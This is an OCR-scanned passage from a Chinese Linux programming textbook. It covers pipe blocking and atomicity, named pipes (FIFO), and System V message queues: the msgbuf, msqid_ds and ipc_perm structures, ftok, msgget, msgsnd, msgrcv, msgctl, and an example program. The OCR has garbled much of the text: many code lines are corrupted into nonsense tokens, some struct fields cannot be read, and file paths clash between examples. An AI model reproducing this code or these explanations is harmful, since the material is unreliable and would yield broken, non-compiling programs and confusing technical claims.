管道 进行 写 入 操作 的 时 候 ， 当 写 入 数据 的 数目 小 于 128K 时 写 入 是 非 原子 的 ， 如 果 把 
父 进程 中 的 两 次 写 入 字 节 数 都 改 为 128K, 可 以 发 现 : 写 入 管道 的 数据 量 大 于 128K 字 节 时 ， 
缓冲 区 的 数据 将 被 连续 地 写 入 管道 ， 直 到 数据 全 部 写 完 为 止 ， 如 果 没 有 进程 读数 据 ， 则 一 
直 阻 塞 。 


5. 管道 操作 原子 性 的 代码 


例如 ， 下 面 的 代码 为 一 个 管道 读 写 的 例子 。 在 成 功 建立 管道 后 ， 子 进程 向 管道 中 写 入 
数据 ， 父 进程 从 管道 中 读 出 数据 。 子 进程 一 次 写 入 128K 个 字 节 的 数据 ， 父 进程 每 次 读 取 
10K 字 节 的 数据 。 当 父 进程 没有 数据 可 读 的 时 候 退出 。 


01 #include <stdio.h> 

02 #include <stdlib.h> 

03 #include <string.h> 

04 #include <unistd.h> 

05 #include <sys/types.h> 
06 #define K 1024 

07 #define WRITELEN (128*K) 
08 int main(void) 


09 { 

10 int result = -1; /* 创 建 管道 结果 */ 
i int fd[2],nbytes; /* 文 件 描述 符 , 字 符 个 数 */ 
12 pid t pid; /*PID 值 */ 

13 char string[WRITELEN] = "你 好 ,管道 "; 

14 char readbuffer[10*K]; /* 读 缓冲 区 */ 

15 /* 文件 描述 符 1 用 于 写 ,文件 描述 符 0 用 于 读 */ 

16 int *write fd = &fd[1]; 

17 int *read fd = &fd[0]; 

18 

19 result = pipe (fd); /* 建 立 管道 #/ 

20 pl ESDHE) /* 建 立 管道 失败 */ 
2 { 

22 printf ("建立 管道 失败 \n") ; /* 打 印信 息 */ 

23 Deturn = /* 返 回 错误 结果 */ 


ss 


第 1 篇 Linux 网 络 开发 基础 


24 } 

25 

26 Biol Fock /* 分 义 程序 */ 

27 1F( = ss pid) /*fork 失败 */ 

28 { 

29 printf ("fork 进程 失败 \n"); /* 打 印信 息 */ 

30 return -1; /* 返 回 错误 结果 */ 

人 } 

32 

33 if( 0 == pid) /* 子 进程 #/ 

34 { 

本 int write size = WRITELEN; /* 写 入 的 长 度 */ 

36 result = 0; /* 结 果 */ 

37 close (*read fd); /* 关 闭 读 端 */ 

38 while( write size >= 0) /* 如 果 没 有 将 数据 写 入 继续 操作 */ 

39 { 

40 result = write(*write fd,string,write size); 
/* 写 入 管道 数据 */ 

41 if(result >0) /* 写 入 成 功 */ 

42 { 

43 write_size -= result;  /* 写 入 的 长 度 */ 

44 Printf(" 写 入 sd 个 数据 , 剩余 sd 个 数据 \n", result,write size); 

45 } 

46 else /* 写 入 失败 */ 

47 { 

48 sleep(10) /* 等 待 10s, 读 端 将 数据 读 出 */ 

49 1 

50 } 

号 return 0; 

四 忆 } 

53 else /* 父 进程 */ 

54 { 

SE close (*write fd); /* 关 闭 写 端 */ 

56 while (1) /* 一 直 读 取 数据 */ 

5 { 

58 nbytes = read(*read fd, readbuffer,sizeof (readbuffer)); 
/* 读 取 数 据 */ 

59 if (nbytes <= 0) /* 读 取 失 败 */ 

60 { 

61 printf ("没有 数据 写 入 了 \n") ; /* 打 印信 息 */ 

62 break; /* 退 出 循环 */ 

63 } 

64 printf ("接收 到 %d 个 数据 , 内 容 为 : "%s"\n",nbytes,readbuffer); 

65 下 

66 

67 3 

68 

69 return 0; 

20 


6. 管道 原子 性 的 例子 运行 结果 
将 上 述 代码 编译 运行 ， 其 输出 为 : 
接收 到 10240 个 数据 , 内 容 为 : "你 好 ,管道 " 
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接收 到 10240 个 数据 , 内容 为 : "" 
接收 到 10240 个 数据 , 内 容 为 : "" 
接收 到 10240 个 数据 , 内 容 为 : "" 
接收 到 10240 个 数据 , 内 容 为 : "" 
接收 到 10240 个 数据 , 内 容 为 : "" 
接收 到 10240 个 数据 , 内 容 为 : "" 
接收 到 10240 个 数据 , 内 容 为 : "" 
写 入 131072 个 数据 ,剩余 0 个 数据 
接收 到 10240 个 数据 , 内 容 为 : "" 
接收 到 10240 个 数据 ,内容 为 : "" 
接收 到 10240 个 数据 , 内 容 为 : "" 
接收 到 10240 个 数据 , 内 容 为 : "" 
接收 到 8192 个 数据 ,内容 为 : "" 


可 以 发 现 ， 父 进程 每 次 读 取 10K 字 节 的 数据 ， 读 了 13 次 将 全 部 数据 读 出 。 最 后 一 次 
读数 据 ， 由 于 缓冲 区 中 只 有 8K 字 节 的 数据 ， 所 以 仅 读 取 了 8K 字 节 。 

子 进程 一 次 性 地 写 入 128K 字 节 的 数据 ， 当 父 进程 将 全 部 数据 读 取 完 毕 的 时 候 ， 子 进 
程 的 write() 函 数 才 返 回 将 写 入 信息 〈“ 写 入 131072 个 数据 ， 剩 余 0 个 数据 ?7 打印 出 来 。 

上 述 操作 证 明 管道 的 操作 是 阻塞 性 质 的 。 


4.3.2 ”命名 管道 


命名 管道 的 工作 方式 与 普通 的 管道 非常 相似 ， 但 也 有 一 些 明显 的 区 别 。 
口 在 文件 系统 中 命名 管道 是 以 设备 特殊 文件 的 形式 存在 的 。 
口 不 同 的 进程 可 以 通过 命名 管道 共享 数据 。 


1. 创建 FIFO 


有 许多 种 方法 可 以 创建 命名 管道 。 其 中 ， 可 以 直接 用 shell 来 完成 。 例 如 ， 在 目录 /tmp 
下 建立 一 个 名 字 为 namedfifo 的 命名 管道 : 
$mkfifo /ipc/namedfifo 


$1ls -1 /ipc/namedfifo 
prw-rw-r-- 1 linux-c linux-c 0 5 月 31 22:56 /tmp/namedfifo 


可 以 看 出 namedfifo 的 属性 中 有 一 个 p， 表 示 这 是 一 个 管道 。 
为 了 用 C 语言 创建 IFO， 用 户 可 以 使 用 mkfifo0 函 数 。 


#include <sys/types.h> 
#include <sys/stat.h> 
int mkfifo(const char *pathname, mode t mode); 


2. FIFO 操作 


对 命名 管道 FIFO 来 说 ，IO 操作 与 普通 的 管道 IO 操作 基本 上 是 一 样 的 ， 二 者 之 间 存 
在 着 一 个 主要 的 区 别 。 在 FIFO 中 ， 必 须 使 用 一 个 open() 函 数 来 显 式 地 建立 连接 到 管道 的 
通道 。 一 般 来 说 FIFO 总 是 处 于 阻塞 状态 。 也 就 是 说 ， 如 果 命 名 管道 FIFO 打开 时 设置 了 读 
权限 ， 则 读 进程 将 一 直 “ 阻 塞 ” 一 直到 其 他 进程 打开 该 FIFO 并 且 向 管道 中 写 入 数据 。 这 
个 阻塞 动作 反 过 来 也 是 成 立 的 ， 如 果 一 个 进程 打开 一 个 管道 写 入 数据 ， 当 没有 进程 冲 管道 
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中 读 取 数 据 的 时 候 ， 写 管道 的 操作 也 是 阻塞 的 ， 直 到 已 经 写 入 的 数据 被 读 出 后 ， 才 能 进行 
写 入 操作 。 如 果 不 希 望 在 进行 命名 管道 操作 的 时 候 发 生 阻 塞 ， 可 以 在 open(0) 调 用 中 使 用 
O_NONBLOCK 标志 ， 以 关闭 默认 的 阻塞 动作 。 
4.3.3 消息 队列 

消息 队列 是 内 核 地 址 空间 中 的 内 部 链表 ， 通 过 Linux 内 核 在 各 个 进程 之 间 传 递 内 容 。 
消息 顺序 地 发 送 到 消息 队列 中 ， 并 以 几 种 不 同 的 方式 从 队列 中 获取 ， 每 个 消息 队列 可 以 用 
IPC 标识 符 唯 一 地 进行 标识 。 内 核 中 的 消息 队列 是 通过 IPC 的 标识 符 来 区 别 的 ， 不 同 的 消 
息 队 列 之 间 是 相对 独立 的 。 每 个 消息 队列 中 的 消息 ， 又 构成 一 个 独立 的 链表 。 

1. 消息 缓冲 区 结构 

常用 的 结构 是 msgbuf 结构 。 程 序 员 可 以 以 这 个 结构 为 模板 定义 自己 的 消息 结构 。 在 
头 文件 <linux/msg.h> 中 ， 它 的 定义 如 下 : 

struct msgbuf { 


long mtype; 
char mtext[1]7 


}; 

在 结构 msgbuf 中 有 以 下 两 个 成 员 。 

口 mtype: 消息 类 型 ， 以 正 数 来 表示 。 用 户 可 以 给 某 个 消息 设 定 一 个 类 型 ， 可 以 在 消 

息 队 列 中 正确 地 发 送 和 接收 自己 的 消息 。 例 如 ， 在 socket 编程 过 程 中 ， 一 个 服务 
器 可 以 接受 多 个 客户 端的 连接 ， 可 以 为 每 个 客户 端 设 定 一 个 消息 类 型 ， 服 务 器 和 
客户 端 之 间 的 通信 可 以 通过 此 消息 类 型 来 发 送 和 接收 消息 ， 并 且 多 个 客户 端 之 间 
通过 消息 类 型 来 区 分 。 

口 mtext: 消息 数据 。 

消息 数据 的 类 型 为 char， 长 度 为 1。 在 构建 自己 的 消息 结构 时 ， 这 个 域 并 不 一 定 要 设 
为 char 或 者 长 度 为 1。 可 以 根据 实际 的 情况 进行 设 定 ， 这 个 域 能 存放 任意 形式 的 任意 数据 ， 
应 用 程序 编程 人 员 可 以 重新 定义 msgbuf 结构 。 例 如 : 

struct msgmbuf{ 

long mtype; 
char mtext [10]; 

网 long length; 

上 面 定义 的 消息 结构 与 系统 模板 定义 的 不 一 致 ， 但 是 mtype 是 一 致 的 。 消 息 在 通过 内 
核 在 进程 之 间 收 发 时 ， 内 核 不 对 mtext 域 进行 转换 ， 任 意 的 消息 都 可 以 发 送 。 具 体 的 转换 
工作 是 在 应 用 程序 之 间 进 行 的 。 但 是 ， 消 息 的 大 小 ， 存 在 一 个 内 部 的 限制 。 在 Linux 中 ， 
它 在 Linux/msg.h 中 的 定义 如 下 : 


#define MSGMAX 8192 


消息 总 的 大 小 不 能 超过 8192 个 字 节 ， 这 其 中 包括 mtype 成 员 ， 它 的 长 度 是 4 个 字 节 
(long 类 型 )。 


“Me 
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2. 结构 msgid_ds 


内 核 msgid ds 结构 一 IPC 对 象 分 为 3 类 ， 每 一 类 都 有 一 个 内 部 数据 结构 ， 该 数据 结构 
是 由 内 核 维护 的 。 对 于 消息 队列 而 言 ， 它 的 内 部 数据 结构 是 msgid_ds 结构 。 对 于 系统 上 创 
建 的 每 个 消息 队列 , 内 核 均 为 其 创建 、 存 储 和 维护 该 结构 的 一 个 实例 。 该 结构 在 Linux/msg.h 
中 定义 ， 如 下 所 示 。 


struct msqid ds { 
struct ipc perm msg perm; 


time t msg_stime; 。 /* 发 送 到 队列 的 最 后 一 个 消息 的 时 间 惟 */ 
time 七 msg_rtime; 。 /* 从 队列 中 获取 的 最 后 一 个 消息 的 时 间 玲 */ 
time t msg_ctime; ”/* 对 队列 进行 最 后 一 次 变动 的 时 间 戳 */ 


unsigned long __ msg cbytes; /* 在 队列 上 所 驻 留 的 字 节 总 数 */ 
msgqnum 七 msg_qnum; /* 当 前 处 于 队列 中 的 消息 数目 #/ 
msglen t msg_qbytes; ”/* 队 列 中 能 容纳 的 字 节 的 最 大 数目 */ 
Pid 七 msg_lspid; /* 发 送 最 后 一 个 消息 进程 的 PID */ 
RiggE msg_lrpid; /* 接 收 最 后 一 个 消息 进程 的 PID */ 
}; 
为 了 叙述 的 完整 性 ， 下 面 对 每 个 成 员 都 给 出 一 个 简短 的 介绍 。 
口 msg_perm: 它 是 ipc_perm 结构 的 一 个 实例 ，ipc_perm 结构 是 在 Linux/ipc.h 中 定义 
的 。 用 于 存放 消息 队列 的 许可 权限 信息 ， 其 中 包括 访问 许可 信息 ， 以 及 队列 创建 
者 的 有 关 信息 (如 uid 等 ) 。 
msg_stime: 发 送 到 队列 的 最 后 一 个 消息 的 时 间 戳 (time t) 。 
msg_rtime: 从 队列 中 获取 最 后 一 个 消息 的 时 间 戳 。 
msg_ctime: 对 队列 进行 最 后 一 次 变动 的 时 间 戳 。 
msg_cbytes: 在 队列 上 所 驻 留 的 字 节 总 数 〈 即 所 有 消息 的 大 小 的 总 和 )。 
msg_qnum: 当前 处 于 队列 中 的 消息 数目 。 
msg_qbytes: 队列 中 能 容纳 的 字 节 的 最 大 数目 。 
msg_lspid: 发 送 最 后 一 个 消息 进程 的 PID。 
msg_lrpid: 接收 最 后 一 个 消息 进程 的 PID。 


DOOOOOO DO 


3. 结构 ipc_perm 

内 核 把 IPC 对 象 的 许可 权限 信息 存放 在 ipc_perm 类 型 的 结构 中 。 例如 在 前 面 描述 的 某 
个 消息 队列 的 内 部 结构 中 ，msg_perm 成 员 就 是 ipc_perm 类 型 的 ， 它 的 定义 是 在 文件 
<linux/ipch> 中 ， 如 下 所 示 。 


struct ipc perm { 


key t key; /* 函 数 msgget () 使 用 的 键 值 */ 
uid t uid; /* 用 户 的 UID*/ 

gid t gid; /* 用 户 的 GID*/ 

SEEECUUGS /# 建 立 者 的 UTD*/ 
ECG /* 建 立 者 的 GID*/ 

unsigned short mode; /* 权 限 */ 

unsigned short seq; /* 序 列 号 */ 


有 = 
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这 个 结构 描述 的 主要 是 一 些 底层 的 东西 ， 简 单 介绍 如 下 。 
口 key: key 参数 用 于 区 分 消息 队列 。 

口 uid: 消息 队列 用 户 的 ID 号 。 

口 gid: 消息 队列 用 户 组 的 ID 号 。 
区 
回 
口 
口 


cuid: 消息 队列 创建 者 的 ID 号 。 

cgid: 消息 队列 创建 者 的 组 ID 号 。 

mode: 权限 ， 用 户 控制 读 写 ， 例 如 0666， 可 以 对 消息 进行 读 写 操作 。 
seq: 序列 号 。 


4. 内 核 中 的 消息 队列 关系 


作为 IPC 的 消息 队列 ， 其 消息 的 传递 是 通过 Linux 内 核 来 进行 的 。 如 图 4.4 所 示 的 结 
构成 员 与 用 户 空间 的 表述 基本 一 致 。 在 消息 的 发 送 和 接收 的 时 候 ， 内 核 通 过 一 个 比较 巧妙 
的 设置 来 实现 消息 插入 队列 的 动作 和 从 消息 中 查找 消息 的 算法 。 


struct kern_ipc_perm 


spinlock t lock; 
int deleted; 
int id; 
key_t key; 
uid tuid; 
struct msg_queue gid t gid; 
struct kern_ipc_perm q_perm uid_t cuid; 
time tq stime; gid tcgid; 
time tdq_rtime mode_t mode; 
time t q_ctime unsigned long seq; 
unsigned long q_cbytes void *security; 
unsigned long q_qnum 
unsigned long q_qbytes 
pid tq_lspid 消息 链表 
pid tq lrpid 
struct list head q_messages 
= struct msg_ msg truct list head 
struct list head q_receivers /名 i struct list head *next 
struct list_head q_senders 00 be 一 struot list head *prev 
int m ts 


struct msg_msgseg* next 
Void *security 


struct msg_msg struct list_ head 
struct list_head *next 


Struct list_head m_list 
long m_type struct list_head *prev 


int m_ts 


struct msg_msgseg* next 


$= *security 7/ 


图 4.4 消息 机 制 在 内 核 中 的 实现 
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结构 list_head 形成 一 个 链表 , 而 结构 msg_msg 之 中 的 m_list 成 员 是 一 个 struct list_ head 
类 型 的 变量 ， 通 过 此 变量 ， 消 息 形成 了 一 个 链表 ， 在 查找 和 插入 时 ， 对 m_list 域 进行 偏 移 
操作 就 可 以 找到 对 应 的 消息 体位 置 。 内 核 中 的 代码 在 头 文件 <linux/msg.h> 和 <linux/msg.c> 
中 ， 主 要 的 实现 是 插入 消息 和 取出 消息 的 操作 。 

5. 键 值 构建 fok() 函 数 

ftok() 函 数 将 路 径 名 和 项 目的 表示 符 转 变 为 一 个 系统 V 的 IPC 键 值 。 其 原型 如 下 : 

# include <sys/types.h> 


# include <sys/ipc.h> 
key 七 ftok (const char *pathname, int proj id); 


其 中 pathname 必须 是 已 经 存在 的 目录 ， 而 proj_id 则 是 一 个 8 位 的 值 ， 通 常用 a、b 等 
表示 。 例 如 建立 如 下 目录 : 


$mkdir -p /ipc/msg/ 


然后 用 如 下 代码 生成 一 个 键 值 : 


key t key; 


char *msgpath = "/ipc/msg/"; /* 生 成 魔 数 的 文件 路 径 */ 
key = ftok (msgpath,'a'); /* 生 成 魔 数 */ 
if(key != -1) /*# 成 功 */ 


‘ 
printf ("成 功 建立 KEY\n"); 
} 
Else /* 失 败 */ 
{ 
printf ("建立 KEY 失败 \n")， 
} 


6. 获得 消息 msgget() 函 数 


创建 一 个 新 的 消息 队列 ， 或 者 访问 一 个 现 有 的 队列 ， 可 以 使 用 函数 msgget()， 其 原型 
如 下 : 

#include <sys/types.h> 

#include <sys/ipc.h> 

#include <sys/msg.h> 

int msgget (key t key, int msgf1g); 

msgget() 函 数 的 第 一 个 参数 是 键 值 ， 可 以 用 ftok0 函 数 生成 ， 这 个 关键 字 的 值 将 被 拿 来 
与 内 核 中 其 他 消息 队列 的 现 有 关键 字 值 相 比 较 。 比 较 之 后 ,打开 或 者 访问 操作 依赖 于 msgflg 
参数 的 内 容 。 

口 IPC_CREAT: 如 果 在 内 核 中 不 存在 该 队列 ， 则 创建 它 。 

口 IPC_EXCL: 当 与 PC_CREAT 一 起 使 用 时 ， 如 果 队 列 早已 存在 则 将 出 错 。 

如 果 只 使 用 了 IPC_CREAT,msgget() 函 数 或 者 返回 新 创建 消息 队列 的 消息 队列 标识 符 ， 
或 者 会 返回 现 有 的 具有 同一 个 关键 字 值 的 队列 的 标识 符 。 如 果 同 时 使 用 了 IPC_EXCL 和 


a 
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IPC_CREAT， 那 么 将 可 能 会 有 两 个 结果 : 创建 一 个 新 的 队列 ， 如 果 该 队列 存在 ， 则 调用 将 
出 错 ， 并 返回 一 1。IPC_EXCL 本 身 是 没有 什么 用 处 的 ， 但 在 与 IPC_CREAT 组 合 使 用 时 ， 
它 可 以 用 于 保证 没有 一 个 现存 的 队列 为 了 访问 而 被 打开 。 例 如 ， 下 面 的 代码 创建 一 个 消息 
队列 : 


key 七 key; 
int msg flags, msg id; 
msg_flags = IPC CREAT|IPC EXCL; /* 消 息 的 标志 为 建立 、 可 执行 */ 
msg_id = msgget (key, msg_ flags|0x0666); /* 建 立 消息 */ 
TE (so /* 建 立 消息 失败 */ 
{ 
printf ("消息 建立 失败 \n")， /* 打 印信 息 */ 
return 0; /* 退 出 #/ 


7. 发 送 消息 msgsnd() 函 数 


- 且 获 得 了 队列 标识 符 ， 用 户 就 可 以 开始 在 该 消息 队列 上 执行 相关 操作 了 。 为 了 向 队 
列传 递 消息 ， 用 户 可 以 使 用 msgsnd() 函 数 : 
#include <sys/types.h> 
#include <sys/ipc.h> 


#include <sys/msg.h> 
int msgsnd (int msqid, const void *msgp, size t msgsz, int msgflg); 


msgsnd() 函 数 的 第 1 个 参数 是 队列 标识 符 ， 它 是 前 面 调用 msgget() 获 得 的 返回 值 。 第 
-个 参数 是 msgp， 它 是 一 个 void 类 型 的 指针 ， 指 向 一 个 消息 缓冲 区 。msgsz 参数 则 包含 着 
消息 的 大 小 ， 它 是 以 字 节 为 单位 的 ， 其 中 不 包括 消息 类 型 的 长 度 (4 个 字 节 长 )。 

msgflg 参数 可 以 设置 为 0 (表示 忽略 )， 也 可 以 设置 为 I PC_NOWAIT。 如 果 消 息 队 列 
已 满 ， 则 消息 将 不 会 被 写 入 到 队列 中 。 如 果 没 有 指定 IPC_NOWAIT， 则 调用 进程 将 被 中 断 
(阻塞 )， 直 到 可 以 写 消息 为 止 。 例 如 ， 如 下 代码 向 已 经 打开 的 消息 队列 发 送 消息 : 


struct msgmbuf{ /* 消 息 的 结构 */ 
int mtype; /* 消 息 中 的 字 节 数 */ 
char mtext[10]; /#* 消 息 数据 */ 
}; 
int msg_sflags; /* 消 息 的 标记 */ 
int msg id; /* 消 息 ID 识别 号 */ 
struct msgmbuf msg mbuf; /* 建 立 消 息 结构 变量 */ 
msg_sflags = IPC NOWAIT; /* 直 接 读 取消 息 , 不 等 待 */ 
msg_ mbuf.mtype = 10; /* 消 息 的 大 小 为 10 字 节 */ 
memcpy (msg_mbuf .mtext, "测试 消息 ", sizeof ("测试 消息 ") ); 
/* 将 数据 复制 如 消息 数据 缓冲 区 */ 
ret = msgsnd (msg_id，&msg mbuf,，sizeof ("测试 消息 "),， msg_sflags); 
/* 向 消息 ID 发 送 消 息 */ 
Tl el Se Sa) /* 发 送 消息 失败 *#/ 
{ 
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Printf(" 发 送 消息 失败 \n") ; /* 打 印 消息 */ 


首先 将 要 发 送 的 消息 打包 到 msg_mbufmtext 域 中 , 然后 调用 msgsnd 发 送 消息 给 内 核 。 
这 里 的 mtype 设置 了 类 型 为 10, 当 接收 时 必须 设置 此 域 为 10, 才能 接收 到 这 时 发 送 的 消息 。 
msgsnd() 函 数 的 msg_id 是 之 前 msgget 创建 的 。 


8. 接收 消息 msgrcv() 函 数 


当 获 得 队列 标识 符 后 ， 用 户 就 可 以 开始 在 该 消息 队列 上 执行 消息 队列 的 接收 操作 。 
msgrev() 函 数 用 于 接收 队列 标识 符 中 的 消息 ， 函 数 原型 如 下 : 

#include <sys/types.h> 

#include <sys/ipc.h> 

#include <sys/msg.h> 

ssize t msgrcv (int msqid, void *msgp, size t msgsz, long msgtyp, int msgf1g); 


口 msgrev() 函 数 的 第 1 个 参数 msqid 是 用 来 指定 , 在 消息 获取 过 程 中 所 使 用 的 队列 (该 
值 是 由 前 面 调用 msgget() 得 到 的 返回 值 ) 。 

口 第 2 个 参数 msgp 代表 消息 缓冲 区 变量 的 地 址 ， 获 取 的 消息 将 存放 在 这 里 。 

口 第 3 个 参数 msgsz 代表 消息 缓冲 区 结构 的 大 小 ， 不 包括 mtype 成 员 的 长 度 。 

口 第 4 个 参数 mtype 指定 要 从 队列 中 获取 的 消息 类 型 。 内 核 将 查找 队列 中 具有 

类 型 的 第 一 个 到 达 的 消息 ， 并 把 它 复 制 返回 到 由 msgp 参数 所 指定 的 地 址 中 。 如 果 
mtype 参数 传送 一 个 为 0 的 值 ， 则 将 返回 队列 中 最 老 的 消息 ， 不 管 该 消息 的 类 型 是 
什么 。 

如 果 把 IPC_ NOWAIT 作为 一 个 标志 传送 给 该 函数 ， 而 队列 中 没有 任何 消息 ， 则 该 次 
调用 将 会 向 调用 进程 返回 ENOMSG。 否则 ， 调 用 进程 将 阻塞 ， 直到 满足 msgrev() 参 数 的 消 
息 到 达 队 列 为 止 。 如 果 在 客户 等 待 消息 的 时 候 队 列 被 删除 了 ， 则 返回 EIDRM。 如 果 在 进程 
阻塞 并 等 待 消息 的 到 来 时 捕获 到 一 个 信号 ， 则 返回 EINTR。 函 数 msgrcv 的 使 用 代码 如 下 : 


旺 


msg_rflags = IPC NOWAIT|MSG NOERROR; /* 消 息 接收 标记 */ 
ret = msgrcv (msg_id, é&msg mbuf, 10,10,msg rflags); /* 接 收 消息 */ 
if( =1 == ret) /* 接 收 消息 失败 */ 
L 

printf ("接收 消息 失败 \n"); /* 打 印信 息 */ 
} 
else /* 接 收 消息 成 功 */ 
{ 

printf ("接收 消息 成 功 ,长度 : $d\n", ret); /* 打 印信 息 */ 


} 


上 面 的 代码 中 将 mtype 设置 为 10， 可 以 获得 之 前 发 送 的 内 核 的 消息 获得 〈 因 为 之 前 发 
送 的 mtype 值 也 设置 为 10)，msgrcv 返回 值 为 接收 到 的 消息 长 度 。 


9. 消息 控制 msgctl() 函 数 


通过 前 面 的 介绍 已 经 知道 如 何在 应 用 程序 中 简单 地 创建 和 利用 消息 队列 。 下 面 介绍 一 
下 如 何 直 接地 对 那些 与 特定 的 消息 队列 相 联 系 的 内 部 结构 进行 操作 。 为 了 在 一 个 消息 队列 


“ys 
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上 执行 控制 操作 ， 用 户 可 以 使 用 msgctl0 函 数 。 


#include <sys/types.h> 

#include <sys/ipc.h> 

#include <sys/msg.h> 

int msgctl (int msqid, int cmd, struct msqid ds *buf); 


msgclt0 向 内 核发 送 一 个 cmd 命令 ， 内 核 根据 此 来 判断 进行 何 种 操作 ，buf 为 应 用 层 和 
内 核 空间 进行 数据 交换 的 指针 。 其 中 的 cmd 可 以 为 如 下 值 。 

口 IPC_STAT: 获取 队列 的 msqid_ds 结构 ， 并 把 它 存放 在 buf 变量 所 指定 的 地 址 中 ， 
通过 这 种 方式 ， 应 用 层 可 以 获得 当前 消息 队列 的 设置 情况 ,例如 是 否 有 消息 到 来 、 
消息 队列 的 缓冲 区 设置 等 。 

口 IPC_SET: 设置 队列 的 msqid_ds 结构 的 ipc_perm 成 员 值 ， 它 是 从 buf 中 取得 该 值 
的 。 通 过 IPC_SET 命令 ， 应 用 层 可 以 设置 消息 队列 的 状态 ， - 宙 如 修改 消息 队列 的 
权限 ， 使 其 他 用 户 可 以 访问 或 者 不 能 访问 当前 的 队列 ;甚至 可 以 设置 消息 队列 的 
某 些 当 前 值 来 伪装 。 

口 IPC_ RMID: 内 核 删 除 队 列 。 使 用 此 命令 执行 后 ， 内 核 会 把 此 消息 队列 从 系统 中 
删除 。 


4.3.4 消息 队列 的 一 个 例子 


本 例 在 建立 消息 队列 后 ， 打 印 其 属性 ， 并 在 每 次 发 送 和 接收 后 均 查 看 其 属性 ， 最 后 对 
消息 队列 进行 修改 。 


1. 显示 消息 属性 的 函数 msg_show _attr() 


msg_show_attr() 函 数 根据 用 户 输入 的 消息 ID， 将 消息 队列 中 的 字 节 数 、 消 息 数 、 最 大 
字 节 数 、 最 后 发 送 消息 的 进程 、 最 后 接收 消息 的 进程 、 最 后 发 送 消 息 的 时 间 、 最 后 接收 消 
息 的 时 间 、 最 后 消息 变化 的 时 间 ， 以 及 消息 的 UID 和 GID 等 信息 进行 打印 。 


01 #include <stdio.h> 

02 #include <stdlib.h> 

03 #include <string.h> 

04 #include <sys/types.h> 

05 #include <sys/msg.h> 

06 #include <unistd.h> 

07 #include <time.h> 

08 #include <sys/ipc.h> 

09 void msg show attr(int msg id, struct msqid ds msg info) 


/* 打 印 消 息 属性 的 函数 */ 
LEO 
11 int ret = -1; 
二 之 sleep (1) ; 
13 ret = msgctl (msg id,，IPC STAT，&msg info); /* 获 取消 息 */ 
14 if( -1 == ret) 
5 { 
16 Printf ("获得 消息 信息 失败 \n") ; /* 获 取消 息 失败 ,返回 */ 
yh return 7 
18 } 
19 
20 printf ("\n"); /* 以 下 打印 消息 的 信息 */ 
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21 printf ("现在 队列 中 的 字 节 数 : $ld\n",msg info.msg cbytes); 

/* 消 息 队列 中 的 字 节 数 */ 
bp printf ("队列 中 消息 数 : $d\n", (int)msg info.msg_qnum); 

/* 消 息 队 列 中 的 消息 数 */ 
23 printf ("队列 中 最 大 字 节 数 : %sd\n", (int)msg info.msg qbytes); 

/* 消 息 队 列 中 的 最 大 字 节 数 */ 
24 printf ("最 后 发 送 消 息 的 进程 pid: Sd\n",msg_ info.msg lspid); 

/* 最 后 发 送 消息 的 进程 */ 
25 printf ("最 后 接收 消息 的 进程 pid:%d\n",msg_info.msg_lrpid); 

/* 最 后 接收 消息 的 进程 */ 
26 printf ("最 后 发 送 消 息 的 时 间 : %s",ctime (& (msg_info.msg_ stime))); 

/* 最 后 发 送 消 息 的 时 间 */ 
2 printf ("最 后 接收 消息 的 时 间 : %s",ctime(& (msg_info.msg rtime))); 

/* 最 后 接收 消息 的 时 间 */ 
28 printf ("最 后 变化 时 间 : %s",ctime(&(msg info.msg ctime))); 

/* 消 息 的 最 后 变化 时 间 */ 
29 printf ("消息 UID 是 : $d\n",msg_info.msg_perm.uid);  ”/* 消 息 的 UID*/ 
30 printf ("消息 GID 是 : $d\n",msg_info.msg perm.gid); ”/* 消 息 的 GID*/ 
310 
2. 主 函 数 main() 


主 函数 先 用 函数 ftok() 使 用 路 径 “/tmp/msg/b” 获 得 一 个 键 值 ， 之 后 进行 相关 的 操作 并 
打印 消息 的 属性 。 
口 调用 函数 msgget() 获 得 一 个 消息 后 ， 打 印 消 息 的 属性 ; 


口 调用 函数 msgsnd() 发 送 一 个 消息 后 ， 打 印 消息 的 属性 ; 
口 调用 函数 msgrev() 接 收 一 个 消息 后 ， 打 印 消息 的 属性 


口 最 后 ， 调 用 函数 msgctl0 并 发 送 命令 IPC_RMID 销毁 消息 队列 。 


01 
02 
03 
04 
05 
06 
07 
08 
09 
10 
1 


int main(void) 


中 


int ret = -1; 
int msg flags, msg id; 
key t key; 
struct msgmbuf{ 

int mtype; 

char mtext[10]; 

}; 
struct msqid ds msg info; 
struct msgmbuf msg mbuf; 


int msg sflags,msg rflags; 
char *msgpath = "/ipc/msg/"; 
key = ftok(msgpath,'b'); 
if(key != -1) 
{ 

printf ("成 功 建立 KEY\Nn"); 
} 
Sloe 
{ 

printf ("建立 KEY 失败 \n") ; 


/* 消 息 的 缓冲 区 结构 */ 

/* 消 息 key 产生 所 用 的 路 径 */ 
/* 产 生 key*/ 

/* 产 生 key 成 功 */ 

/#* 产 生 key 失败 */ 


人 


二 
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msg flags = IPC CREAT|IPC EXCL; /* 消 息 的 类 型 */ 
msg id = msgget (key, msg flags|0x0666); /+* 建 立 消息 */ 
if( -1 == msg_id) 
{ 
printf ("消息 建立 失败 \n"); 
return 0; 
1 
msg_show attr (msg id, msg info); /* 显 示 消 息 的 属性 */ 


msg_sflags = IPC NOWAIT; 
msg mbuf.mtype = 10; 
memcpy (msg_mbuf .mtext, "测试 消息 ", sizeof ("测试 消息 ") ) ; /* 复 制 字符 串 */ 


ret = msgsnd(msg_id, &msg mbuf, sizeof ("测试 消息 ")， msg_sflags); 


/+ 发送 消息 */ 
if( -1 == ret) 
{ 
printf ("发 送 消息 失败 \n"); 
} 
msg_show attr(msg id, msg info); /* 显 示 消息 属性 */ 


msg rflags = IPC NOWRIT1MSG NOERROR; 
ret = msgrcv(msg_id, &msg mbuf, 10,10,msg rflags); 


/* 接 收 消息 */ 
if( -1 == ret) 
、 printf ("接收 消息 失败 \n") ; 
站 
printf ("接收 消息 成 功 ,长 度 : sdxn"vret) ; 
ee (msg_id, msg info); /* 显 示 消 息 属性 */ 


msg_info.msg perm.uid = 8 
msg_info.msg perm.gid 8 
msg_info.msg qbytes = 12345; 

ret = msgctl(msg id，IPC SET，&msg_info); /* 设 置 消息 属性 */ 
if( -1 == ret) 

| 


和 
;? 


printf ("设置 消息 属性 失败 \n") ; 


return 0; 
. 
msg_show attr(msg_id, msg_ info); /* 显 示 消 息 属性 */ 
ret = msgctl (msg_id, IPC RMID,NULL); /* 删 除 消息 队列 */ 


if(-l1 == ret) 

{ 
printf ("删除 消息 失败 \n"); 
return 0; 


return 0; 


